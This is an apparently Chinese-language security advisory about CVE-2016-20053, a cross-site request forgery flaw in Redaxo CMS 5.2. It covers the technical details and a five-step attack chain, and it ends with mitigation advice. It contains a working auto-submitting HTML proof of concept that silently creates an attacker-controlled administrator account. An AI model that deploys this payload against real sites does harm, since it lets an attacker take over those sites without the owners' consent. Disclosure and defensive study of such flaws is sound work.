IPBUF安全漏洞报告
English
CVE-2016-20053 CVSS 5.3 中危

CVE-2016-20053 Redaxo CMS跨站请求伪造漏洞

披露日期: 2026-04-04

漏洞信息

漏洞编号
CVE-2016-20053
漏洞类型
跨站请求伪造 (CSRF)
CVSS评分
5.3 中危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
Redaxo CMS

相关标签

CSRFRedaxo CMS跨站请求伪造权限提升

漏洞概述

Redaxo CMS 5.2版本存在跨站请求伪造(CSRF)漏洞。由于该系统在关键的用户管理接口处缺乏有效的CSRF防护机制,未经身份验证的远程攻击者可以通过诱导已认证的管理员访问恶意网页,利用管理员的浏览器会话向后端服务器发送特制的HTTP请求。成功利用该漏洞后,攻击者可在未经管理员同意的情况下创建新的管理员账户,从而完全接管系统管理权限。

技术细节

该漏洞源于Redaxo CMS在处理用户创建请求时未验证请求来源的合法性。攻击者可以构造一个HTML表单,其中包含用于添加新管理员账户的隐藏字段(如用户名、密码、权限等),并将表单的action指向目标站点的用户管理接口(例如index.php?page=users/users)。当管理员在保持登录状态的情况下访问攻击者精心构造的恶意页面时,浏览器会自动携带管理员的Session Cookie发送POST请求。服务器接收到请求后,误认为是管理员的合法操作,执行添加用户的逻辑,导致攻击者获得管理员权限。

攻击链分析

STEP 1
侦察阶段
攻击者确认目标网站使用的是存在漏洞的Redaxo CMS 5.2版本,并定位到后台用户管理接口的URL路径。
STEP 2
构造攻击载荷
攻击者编写包含恶意HTML表单的网页,表单中预设了新管理员账户的参数,并将提交目标指向受害者网站的用户添加接口。
STEP 3
诱导访问
攻击者通过网络钓鱼或其他社会工程学手段,诱导已登录后台的管理员访问包含恶意代码的网页链接。
STEP 4
执行请求
管理员浏览器加载恶意页面,自动执行表单提交动作,携带管理员的合法Cookie向服务器发送创建用户的请求。
STEP 5
权限获取
服务器处理请求并成功创建新的管理员账户,攻击者利用该账户登录系统,获得完全控制权。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
<!-- PoC Code for CVE-2016-20053 --> <!-- Usage: Host this file and send the link to an authenticated admin --> <html> <body> <form action="http://target-redaxo-url/index.php?page=users/users" method="POST"> <input type="hidden" name="login" value="attacker" /> <input type="hidden" name="password" value="p@ssw0rd" /> <input type="hidden" name="name" value="Evil Admin" /> <input type="hidden" name="role" value="admin" /> <input type="hidden" name="status" value="1" /> <input type="submit" value="Submit Request" /> </form> <script> // Auto-submit the form when the page loads document.forms[0].submit(); </script> </body> </html>

影响范围

Redaxo CMS 5.2

防御指南

临时缓解措施
在官方补丁发布前,建议管理员暂时禁用用户注册/添加功能,或仅允许可信的内网IP访问后台管理界面。此外,管理员应避免点击不明来源的链接,并在使用完后台后及时退出登录。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表